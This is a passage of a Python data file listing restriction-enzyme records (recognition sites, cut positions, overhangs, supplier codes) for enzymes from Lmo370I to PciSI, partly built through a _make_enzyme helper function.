'compsite': '(?=(?P<Lmo370I>AGCGCCG))|(?=(?P<Lmo370I_as>CGGCGCT))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCGCCG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lmo370I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TAGRAG'),
'compsite': '(?=(?P<Lmo911II>TAG[AG]AG))|(?=(?P<Lmo911II_as>CT[CT]CTA))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TAGRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lmo911II'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGGRAG'),
'compsite': '(?=(?P<Lpl1004II>AGG[AG]AG))|(?=(?P<Lpl1004II_as>CT[CT]CCT))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGRAG',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lpl1004II'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'RGCGCY'),
'compsite': '(?=(?P<LpnI>[AG]GCGC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGCGCY',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['LpnI'] = _temp()
def _temp():
return {
'charac': (14, 14, None, None, 'CCDG'),
'compsite': '(?=(?P<LpnPI>CC[AGT]G))|(?=(?P<LpnPI_as>C[ACT]GG))',
'dna': None,
'freq': 85.33333333333333,
'fst3': 14,
'fst5': 14,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCDG',
'size': 4,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['LpnPI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GTTCNAG'),
'compsite': '(?=(?P<Lra68I>GTTC.AG))|(?=(?P<Lra68I_as>CT.GAAC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTTCNAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lra68I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'TGGAAT'),
'compsite': '(?=(?P<LsaDS4I>TGGAAT))|(?=(?P<LsaDS4I_as>ATTCCA))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'TGGAAT',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['LsaDS4I'] = _temp()
def _temp():
return {
'charac': (13, 12, None, None, 'GCAGC'),
'compsite': '(?=(?P<Lsp1109I>GCAGC))|(?=(?P<Lsp1109I_as>GCTGC))',
'dna': None,
'freq': 1024.0,
'fst3': 12,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Lsp1109I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGCACC'),
'compsite': '(?=(?P<Lsp48III>AGCACC))|(?=(?P<Lsp48III_as>GGTGCT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGCACC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lsp48III'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CRAGCAC'),
'compsite': '(?=(?P<Lsp6406VI>C[AG]AGCAC))|(?=(?P<Lsp6406VI_as>GTGCT[CT]G))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRAGCAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Lsp6406VI'] = _temp()
def _temp():
return {
'charac': (10, 9, None, None, 'GCATC'),
'compsite': '(?=(?P<LweI>GCATC))|(?=(?P<LweI_as>GATGC))',
'dna': None,
'freq': 1024.0,
'fst3': 9,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['LweI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACCWGGT'),
'compsite': '(?=(?P<MabI>ACC[AT]GGT))',
'dna': None,
'freq': 8192.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'CCWGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACCWGGT',
'size': 7,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['MabI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTAG'),
'compsite': '(?=(?P<MaeI>CTAG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAG',
'size': 4,
'substrat': 'DNA',
'suppl': ('M',),
}
rest_dict['MaeI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'ACGT'),
'compsite': '(?=(?P<MaeII>ACGT))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACGT',
'size': 4,
'substrat': 'DNA',
'suppl': ('M',),
}
rest_dict['MaeII'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GTNAC'),
'compsite': '(?=(?P<MaeIII>GT.AC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -5,
'ovhgseq': 'GTNAC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GTNAC',
'size': 5,
'substrat': 'DNA',
'suppl': ('M', 'S'),
}
rest_dict['MaeIII'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GATC'),
'compsite': '(?=(?P<MalI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['MalI'] = _temp()
def _temp():
return {
'charac': (28, 19, None, None, 'CRTTGAC'),
'compsite': '(?=(?P<MaqI>C[AG]TTGAC))|(?=(?P<MaqI_as>GTCAA[CT]G))',
'dna': None,
'freq': 8192.0,
'fst3': 19,
'fst5': 28,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CRTTGAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['MaqI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CGCGCGCG'),
'compsite': '(?=(?P<MauBI>CGCGCGCG))',
'dna': None,
'freq': 65536.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCGCGCG',
'size': 8,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['MauBI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'AGGCGA'),
'compsite': '(?=(?P<Mba11I>AGGCGA))|(?=(?P<Mba11I_as>TCGCCT))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGCGA',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Mba11I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CCGCTC'),
'compsite': '(?=(?P<MbiI>CCGCTC))|(?=(?P<MbiI_as>GAGCGG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['MbiI'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'GATC'),
'compsite': '(?=(?P<MboI>GATC))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B', 'C', 'K', 'N', 'Q', 'R', 'X', 'Y'),
}
rest_dict['MboI'] = _temp()
def _make_enzyme(charac, compsite, freq, ovhg, ovhgseq, suppl):
    """Return one restriction-enzyme record for ``rest_dict``.

    ``charac`` is the 5-tuple ``(fst5, fst3, scd5, scd3, site)``.  The
    ``fst5``/``fst3``/``scd5``/``scd3``/``site``/``size`` entries of the
    record are derived from it — every record in this section repeats
    exactly those values.  Key insertion order matches the original
    hand-expanded dict literals (alphabetical).
    """
    fst5, fst3, scd5, scd3, site = charac
    return {
        'charac': charac,
        'compsite': compsite,
        'dna': None,
        'freq': freq,
        'fst3': fst3,
        'fst5': fst5,
        'inact_temp': 65,  # every record in this section uses 65
        'opt_temp': 37,    # every record in this section uses 37
        'ovhg': ovhg,
        'ovhgseq': ovhgseq,
        'results': None,
        'scd3': scd3,
        'scd5': scd5,
        'site': site,
        'size': len(site),  # size always equals len(site) in this section
        'substrat': 'DNA',
        'suppl': suppl,
    }


rest_dict['MboII'] = _make_enzyme(
    (13, 7, None, None, 'GAAGA'),
    '(?=(?P<MboII>GAAGA))|(?=(?P<MboII_as>TCTTC))',
    1024.0, 1, 'N', ('B', 'I', 'J', 'K', 'N', 'Q', 'R', 'V', 'X'))
rest_dict['McaTI'] = _make_enzyme(
    (4, -4, None, None, 'GCGCGC'),
    '(?=(?P<McaTI>GCGCGC))',
    4096.0, 2, 'GC', ())
rest_dict['Mcr10I'] = _make_enzyme(
    (None, None, None, None, 'GAAGNNNNNCTC'),
    '(?=(?P<Mcr10I>GAAG.....CTC))|(?=(?P<Mcr10I_as>GAG.....CTTC))',
    16384.0, None, None, ())
rest_dict['McrI'] = _make_enzyme(
    (4, -4, None, None, 'CGRYCG'),
    '(?=(?P<McrI>CG[AG][CT]CG))',
    1024.0, 2, 'RY', ())
rest_dict['MfeI'] = _make_enzyme(
    (1, -1, None, None, 'CAATTG'),
    '(?=(?P<MfeI>CAATTG))',
    4096.0, -4, 'AATT', ('I', 'N'))
rest_dict['MflI'] = _make_enzyme(
    (1, -1, None, None, 'RGATCY'),
    '(?=(?P<MflI>[AG]GATC[CT]))',
    1024.0, -4, 'GATC', ('K',))
rest_dict['MhlI'] = _make_enzyme(
    (5, -5, None, None, 'GDGCHC'),
    '(?=(?P<MhlI>G[AGT]GC[ACT]C))',
    455.1111111111111, 4, 'DGCH', ('I', 'V'))
rest_dict['MjaIV'] = _make_enzyme(
    (None, None, None, None, 'GTNNAC'),
    '(?=(?P<MjaIV>GT..AC))',
    256.0, None, None, ())
rest_dict['MkaDII'] = _make_enzyme(
    (None, None, None, None, 'GAGAYGT'),
    '(?=(?P<MkaDII>GAGA[CT]GT))|(?=(?P<MkaDII_as>AC[AG]TCTC))',
    8192.0, None, None, ())
rest_dict['MlsI'] = _make_enzyme(
    (3, -3, None, None, 'TGGCCA'),
    '(?=(?P<MlsI>TGGCCA))',
    4096.0, 0, '', ('B',))
rest_dict['Mlu211III'] = _make_enzyme(
    (None, None, None, None, 'AGCCCA'),
    '(?=(?P<Mlu211III>AGCCCA))|(?=(?P<Mlu211III_as>TGGGCT))',
    4096.0, None, None, ())
rest_dict['MluCI'] = _make_enzyme(
    (0, 0, None, None, 'AATT'),
    '(?=(?P<MluCI>AATT))',
    256.0, -4, 'AATT', ('N',))
rest_dict['MluI'] = _make_enzyme(
    (1, -1, None, None, 'ACGCGT'),
    '(?=(?P<MluI>ACGCGT))',
    4096.0, -4, 'CGCG',
    ('B', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'))
rest_dict['MluNI'] = _make_enzyme(
    (3, -3, None, None, 'TGGCCA'),
    '(?=(?P<MluNI>TGGCCA))',
    4096.0, 0, '', ('M',))
rest_dict['Mly113I'] = _make_enzyme(
    (2, -2, None, None, 'GGCGCC'),
    '(?=(?P<Mly113I>GGCGCC))',
    4096.0, -2, 'CG', ('I',))
rest_dict['MlyI'] = _make_enzyme(
    (10, 5, None, None, 'GAGTC'),
    '(?=(?P<MlyI>GAGTC))|(?=(?P<MlyI_as>GACTC))',
    1024.0, 0, '', ('N',))
rest_dict['MmeI'] = _make_enzyme(
    (26, 18, None, None, 'TCCRAC'),
    '(?=(?P<MmeI>TCC[AG]AC))|(?=(?P<MmeI_as>GT[CT]GGA))',
    2048.0, 2, 'NN', ('N', 'X'))
rest_dict['MnlI'] = _make_enzyme(
    (11, 6, None, None, 'CCTC'),
    '(?=(?P<MnlI>CCTC))|(?=(?P<MnlI_as>GAGG))',
    256.0, 1, 'N', ('B', 'I', 'N', 'Q', 'V', 'X'))
rest_dict['Mox20I'] = _make_enzyme(
    (3, -3, None, None, 'TGGCCA'),
    '(?=(?P<Mox20I>TGGCCA))',
    4096.0, 0, '', ('I',))
rest_dict['Mph1103I'] = _make_enzyme(
    (5, -5, None, None, 'ATGCAT'),
    '(?=(?P<Mph1103I>ATGCAT))',
    4096.0, 4, 'TGCA', ('B',))
rest_dict['MreI'] = _make_enzyme(
    (2, -2, None, None, 'CGCCGGCG'),
    '(?=(?P<MreI>CGCCGGCG))',
    65536.0, -4, 'CCGG', ('B',))
rest_dict['MroI'] = _make_enzyme(
    (1, -1, None, None, 'TCCGGA'),
    '(?=(?P<MroI>TCCGGA))',
    4096.0, -4, 'CCGG', ('M', 'O'))
rest_dict['MroNI'] = _make_enzyme(
    (1, -1, None, None, 'GCCGGC'),
    '(?=(?P<MroNI>GCCGGC))',
    4096.0, -4, 'CCGG', ('I', 'V'))
rest_dict['MroXI'] = _make_enzyme(
    (5, -5, None, None, 'GAANNNNTTC'),
    '(?=(?P<MroXI>GAA....TTC))',
    4096.0, 0, '', ('I', 'V'))
rest_dict['MscI'] = _make_enzyme(
    (3, -3, None, None, 'TGGCCA'),
    '(?=(?P<MscI>TGGCCA))',
    4096.0, 0, '', ('N', 'O'))
rest_dict['MseI'] = _make_enzyme(
    (1, -1, None, None, 'TTAA'),
    '(?=(?P<MseI>TTAA))',
    256.0, -2, 'TA', ('N',))
rest_dict['MslI'] = _make_enzyme(
    (5, -5, None, None, 'CAYNNNNRTG'),
    '(?=(?P<MslI>CA[CT]....[AG]TG))',
    1024.0, 0, '', ('N',))
rest_dict['Msp20I'] = _make_enzyme(
    (3, -3, None, None, 'TGGCCA'),
    '(?=(?P<Msp20I>TGGCCA))',
    4096.0, 0, '', ('V',))
rest_dict['MspA1I'] = _make_enzyme(
    (3, -3, None, None, 'CMGCKG'),
    '(?=(?P<MspA1I>C[AC]GC[GT]G))',
    1024.0, 0, '', ('I', 'N', 'R', 'V'))
rest_dict['MspCI'] = _make_enzyme(
    (1, -1, None, None, 'CTTAAG'),
    '(?=(?P<MspCI>CTTAAG))',
    4096.0, -4, 'TTAA', ('C',))
rest_dict['MspGI'] = _make_enzyme(
    (5, -5, None, None, 'GCCGGC'),
    '(?=(?P<MspGI>GCCGGC))',
    4096.0, 4, 'CCGG', ())
rest_dict['MspI'] = _make_enzyme(
    (1, -1, None, None, 'CCGG'),
    '(?=(?P<MspI>CCGG))',
    256.0, -2, 'CG', ('B', 'I', 'J', 'K', 'N', 'Q', 'R', 'V', 'X'))
rest_dict['MspI7II'] = _make_enzyme(
    (None, None, None, None, 'ACGRAG'),
    '(?=(?P<MspI7II>ACG[AG]AG))|(?=(?P<MspI7II_as>CT[CT]CGT))',
    2048.0, None, None, ())
rest_dict['MspI7IV'] = _make_enzyme(
    (None, None, None, None, 'GCMGAAG'),
    '(?=(?P<MspI7IV>GC[AC]GAAG))|(?=(?P<MspI7IV_as>CTTC[GT]GC))',
    8192.0, None, None, ())
rest_dict['MspJI'] = _make_enzyme(
    (13, 13, None, None, 'CNNR'),
    '(?=(?P<MspJI>C..[AG]))|(?=(?P<MspJI_as>[CT]..G))',
    8.0, -4, 'NNNN', ('N',))
rest_dict['MspR9I'] = _make_enzyme(
    (2, -2, None, None, 'CCNGG'),
    '(?=(?P<MspR9I>CC.GG))',
    256.0, -1, 'N', ('I',))
rest_dict['MspSC27II'] = _make_enzyme(
    (None, None, None, None, 'CCGCGAC'),
    '(?=(?P<MspSC27II>CCGCGAC))|(?=(?P<MspSC27II_as>GTCGCGG))',
    16384.0, None, None, ())
rest_dict['MssI'] = _make_enzyme(
    (4, -4, None, None, 'GTTTAAAC'),
    '(?=(?P<MssI>GTTTAAAC))',
    65536.0, 0, '', ('B',))
rest_dict['MstI'] = _make_enzyme(
    (3, -3, None, None, 'TGCGCA'),
    '(?=(?P<MstI>TGCGCA))',
    4096.0, 0, '', ())
rest_dict['MteI'] = _make_enzyme(
    (4, -4, None, None, 'GCGCNGCGC'),
    '(?=(?P<MteI>GCGC.GCGC))',
    65536.0, -1, 'N', ('I',))
rest_dict['MtuHN878II'] = _make_enzyme(
    (None, None, None, None, 'CACGCAG'),
    '(?=(?P<MtuHN878II>CACGCAG))|(?=(?P<MtuHN878II_as>CTGCGTG))',
    16384.0, None, None, ())
rest_dict['MunI'] = _make_enzyme(
    (1, -1, None, None, 'CAATTG'),
    '(?=(?P<MunI>CAATTG))',
    4096.0, -4, 'AATT', ('B', 'K', 'M', 'S'))
rest_dict['Mva1269I'] = _make_enzyme(
    (7, -1, None, None, 'GAATGC'),
    '(?=(?P<Mva1269I>GAATGC))|(?=(?P<Mva1269I_as>GCATTC))',
    4096.0, 2, 'CN', ('B',))
rest_dict['MvaI'] = _make_enzyme(
    (2, -2, None, None, 'CCWGG'),
    '(?=(?P<MvaI>CC[AT]GG))',
    512.0, -1, 'W', ('B', 'M'))
rest_dict['MvnI'] = _make_enzyme(
    (2, -2, None, None, 'CGCG'),
    '(?=(?P<MvnI>CGCG))',
    256.0, 0, '', ('M',))
rest_dict['MwoI'] = _make_enzyme(
    (7, -7, None, None, 'GCNNNNNNNGC'),
    '(?=(?P<MwoI>GC.......GC))',
    256.0, 3, 'NNN', ('N',))
rest_dict['NaeI'] = _make_enzyme(
    (3, -3, None, None, 'GCCGGC'),
    '(?=(?P<NaeI>GCCGGC))',
    4096.0, 0, '', ('C', 'K', 'N'))
rest_dict['Nal45188II'] = _make_enzyme(
    (None, None, None, None, 'ACCAGC'),
    '(?=(?P<Nal45188II>ACCAGC))|(?=(?P<Nal45188II_as>GCTGGT))',
    4096.0, None, None, ())
rest_dict['NarI'] = _make_enzyme(
    (2, -2, None, None, 'GGCGCC'),
    '(?=(?P<NarI>GGCGCC))',
    4096.0, -2, 'CG', ('J', 'M', 'N', 'Q', 'R', 'X'))
rest_dict['Nbr128II'] = _make_enzyme(
    (None, None, None, None, 'ACCGAC'),
    '(?=(?P<Nbr128II>ACCGAC))|(?=(?P<Nbr128II_as>GTCGGT))',
    4096.0, None, None, ())
rest_dict['NciI'] = _make_enzyme(
    (2, -2, None, None, 'CCSGG'),
    '(?=(?P<NciI>CC[CG]GG))',
    512.0, -1, 'S', ('J', 'N', 'R'))
rest_dict['NcoI'] = _make_enzyme(
    (1, -1, None, None, 'CCATGG'),
    '(?=(?P<NcoI>CCATGG))',
    4096.0, -4, 'CATG',
    ('B', 'C', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X', 'Y'))
rest_dict['NdeI'] = _make_enzyme(
    (2, -2, None, None, 'CATATG'),
    '(?=(?P<NdeI>CATATG))',
    4096.0, -2, 'TA', ('B', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'X'))
rest_dict['NdeII'] = _make_enzyme(
    (0, 0, None, None, 'GATC'),
    '(?=(?P<NdeII>GATC))',
    256.0, -4, 'GATC', ('J', 'M'))
rest_dict['NgoAVII'] = _make_enzyme(
    (12, 7, None, None, 'GCCGC'),
    '(?=(?P<NgoAVII>GCCGC))|(?=(?P<NgoAVII_as>GCGGC))',
    1024.0, 0, '', ())
rest_dict['NgoAVIII'] = _make_enzyme(
    (-12, -25, 24, 11, 'GACNNNNNTGA'),
    '(?=(?P<NgoAVIII>GAC.....TGA))|(?=(?P<NgoAVIII_as>TCA.....GTC))',
    4096.0, 2, 'NN', ())
rest_dict['NgoMIV'] = _make_enzyme(
    (1, -1, None, None, 'GCCGGC'),
    '(?=(?P<NgoMIV>GCCGGC))',
    4096.0, -4, 'CCGG', ('N',))
rest_dict['NhaXI'] = _make_enzyme(
    (None, None, None, None, 'CAAGRAG'),
    '(?=(?P<NhaXI>CAAG[AG]AG))|(?=(?P<NhaXI_as>CT[CT]CTTG))',
    8192.0, None, None, ())
rest_dict['NheI'] = _make_enzyme(
    (1, -1, None, None, 'GCTAGC'),
    '(?=(?P<NheI>GCTAGC))',
    4096.0, -4, 'CTAG',
    ('B', 'C', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'))
rest_dict['NhoI'] = _make_enzyme(
    (None, None, None, None, 'GCWGC'),
    '(?=(?P<NhoI>GC[AT]GC))',
    512.0, None, None, ())
rest_dict['NlaCI'] = _make_enzyme(
    (25, 17, None, None, 'CATCAC'),
    '(?=(?P<NlaCI>CATCAC))|(?=(?P<NlaCI_as>GTGATG))',
    4096.0, 2, 'NN', ())
rest_dict['NlaIII'] = _make_enzyme(
    (4, -4, None, None, 'CATG'),
    '(?=(?P<NlaIII>CATG))',
    256.0, 4, 'CATG', ('N',))
rest_dict['NlaIV'] = _make_enzyme(
    (3, -3, None, None, 'GGNNCC'),
    '(?=(?P<NlaIV>GG..CC))',
    256.0, 0, '', ('N',))
rest_dict['Nli3877I'] = _make_enzyme(
    (5, -5, None, None, 'CYCGRG'),
    '(?=(?P<Nli3877I>C[CT]CG[AG]G))',
    1024.0, 4, 'YCGR', ())
rest_dict['NmeA6CIII'] = _make_enzyme(
    (27, 19, None, None, 'GCCGAC'),
    '(?=(?P<NmeA6CIII>GCCGAC))|(?=(?P<NmeA6CIII_as>GTCGGC))',
    4096.0, 2, 'NN', ())
rest_dict['NmeAIII'] = _make_enzyme(
    (27, 19, None, None, 'GCCGAG'),
    '(?=(?P<NmeAIII>GCCGAG))|(?=(?P<NmeAIII_as>CTCGGC))',
    4096.0, 2, 'NN', ('N',))
rest_dict['NmeDI'] = _make_enzyme(
    (-12, -13, 13, 12, 'RCCGGY'),
    '(?=(?P<NmeDI>[AG]CCGG[CT]))',
    1024.0, -5, 'NNNNN', ())
rest_dict['NmuCI'] = _make_enzyme(
    (0, 0, None, None, 'GTSAC'),
    '(?=(?P<NmuCI>GT[CG]AC))',
    512.0, -5, 'GTSAC', ('B',))
rest_dict['NotI'] = _make_enzyme(
    (2, -2, None, None, 'GCGGCCGC'),
    '(?=(?P<NotI>GCGGCCGC))',
    65536.0, -4, 'GGCC',
    ('B', 'C', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'))
rest_dict['NpeUS61II'] = _make_enzyme(
    (None, None, None, None, 'GATCGAC'),
    '(?=(?P<NpeUS61II>GATCGAC))|(?=(?P<NpeUS61II_as>GTCGATC))',
    16384.0, None, None, ())
rest_dict['NruI'] = _make_enzyme(
    (3, -3, None, None, 'TCGCGA'),
    '(?=(?P<NruI>TCGCGA))',
    4096.0, 0, '',
    ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'Q', 'R', 'S', 'X'))
rest_dict['NsbI'] = _make_enzyme(
    (3, -3, None, None, 'TGCGCA'),
    '(?=(?P<NsbI>TGCGCA))',
    4096.0, 0, '', ('B',))
rest_dict['NsiI'] = _make_enzyme(
    (5, -5, None, None, 'ATGCAT'),
    '(?=(?P<NsiI>ATGCAT))',
    4096.0, 4, 'TGCA', ('J', 'M', 'N', 'Q', 'R', 'S', 'X'))
rest_dict['NspBII'] = _make_enzyme(
    (3, -3, None, None, 'CMGCKG'),
    '(?=(?P<NspBII>C[AC]GC[GT]G))',
    1024.0, 0, '', ())
rest_dict['NspI'] = _make_enzyme(
    (5, -5, None, None, 'RCATGY'),
    '(?=(?P<NspI>[AG]CATG[CT]))',
    1024.0, 4, 'CATG', ('N',))
rest_dict['NspV'] = _make_enzyme(
    (2, -2, None, None, 'TTCGAA'),
    '(?=(?P<NspV>TTCGAA))',
    4096.0, -2, 'CG', ('J',))
rest_dict['ObaBS10I'] = _make_enzyme(
    (None, None, None, None, 'ACGAG'),
    '(?=(?P<ObaBS10I>ACGAG))|(?=(?P<ObaBS10I_as>CTCGT))',
    1024.0, None, None, ())
rest_dict['OgrI'] = _make_enzyme(
    (None, None, None, None, 'CAACNAC'),
    '(?=(?P<OgrI>CAAC.AC))|(?=(?P<OgrI_as>GT.GTTG))',
    4096.0, None, None, ())
rest_dict['OliI'] = _make_enzyme(
    (5, -5, None, None, 'CACNNNNGTG'),
    '(?=(?P<OliI>CAC....GTG))',
    4096.0, 0, '', ('B',))
rest_dict['OspHL35III'] = _make_enzyme(
    (None, None, None, None, 'YAGGAG'),
    '(?=(?P<OspHL35III>[CT]AGGAG))|(?=(?P<OspHL35III_as>CTCCT[AG]))',
    2048.0, None, None, ())
rest_dict['PabI'] = _make_enzyme(
    (3, -3, None, None, 'GTAC'),
    '(?=(?P<PabI>GTAC))',
    256.0, 2, 'TA', ())
rest_dict['Pac19842II'] = _make_enzyme(
    (None, None, None, None, 'CCTTGA'),
    '(?=(?P<Pac19842II>CCTTGA))|(?=(?P<Pac19842II_as>TCAAGG))',
    4096.0, None, None, ())
rest_dict['PacI'] = _make_enzyme(
    (5, -5, None, None, 'TTAATTAA'),
    '(?=(?P<PacI>TTAATTAA))',
    65536.0, 2, 'AT', ('B', 'N', 'O'))
rest_dict['PacIII'] = _make_enzyme(
    (None, None, None, None, 'GTAATC'),
    '(?=(?P<PacIII>GTAATC))|(?=(?P<PacIII_as>GATTAC))',
    4096.0, None, None, ())
rest_dict['PaeI'] = _make_enzyme(
    (5, -5, None, None, 'GCATGC'),
    '(?=(?P<PaeI>GCATGC))',
    4096.0, 4, 'CATG', ('B',))
rest_dict['PaeR7I'] = _make_enzyme(
    (1, -1, None, None, 'CTCGAG'),
    '(?=(?P<PaeR7I>CTCGAG))',
    4096.0, -4, 'TCGA', ('N',))
rest_dict['PagI'] = _make_enzyme(
    (1, -1, None, None, 'TCATGA'),
    '(?=(?P<PagI>TCATGA))',
    4096.0, -4, 'CATG', ('B',))
rest_dict['Pal408I'] = _make_enzyme(
    (None, None, None, None, 'CCRTGAG'),
    '(?=(?P<Pal408I>CC[AG]TGAG))|(?=(?P<Pal408I_as>CTCA[CT]GG))',
    8192.0, None, None, ())
rest_dict['PalAI'] = _make_enzyme(
    (2, -2, None, None, 'GGCGCGCC'),
    '(?=(?P<PalAI>GGCGCGCC))',
    65536.0, -4, 'CGCG', ('I',))
rest_dict['PasI'] = _make_enzyme(
    (2, -2, None, None, 'CCCWGGG'),
    '(?=(?P<PasI>CCC[AT]GGG))',
    8192.0, -3, 'CWG', ('B',))
rest_dict['PauI'] = _make_enzyme(
    (1, -1, None, None, 'GCGCGC'),
    '(?=(?P<PauI>GCGCGC))',
    4096.0, -4, 'CGCG', ('B',))
rest_dict['Pba2294I'] = _make_enzyme(
    (None, None, None, None, 'GTAAG'),
    '(?=(?P<Pba2294I>GTAAG))|(?=(?P<Pba2294I_as>CTTAC))',
    1024.0, None, None, ())
rest_dict['PcaII'] = _make_enzyme(
    (None, None, None, None, 'GACGAG'),
    '(?=(?P<PcaII>GACGAG))|(?=(?P<PcaII_as>CTCGTC))',
    4096.0, None, None, ())
rest_dict['PceI'] = _make_enzyme(
    (3, -3, None, None, 'AGGCCT'),
    '(?=(?P<PceI>AGGCCT))',
    4096.0, 0, '', ('I', 'V'))
rest_dict['PciI'] = _make_enzyme(
    (1, -1, None, None, 'ACATGT'),
    '(?=(?P<PciI>ACATGT))',
    4096.0, -4, 'CATG', ('I', 'N'))
rest_dict['PciSI'] = _make_enzyme(
    (8, 4, None, None, 'GCTCTTC'),
    '(?=(?P<PciSI>GCTCTTC))|(?=(?P<PciSI_as>GAAGAGC))',
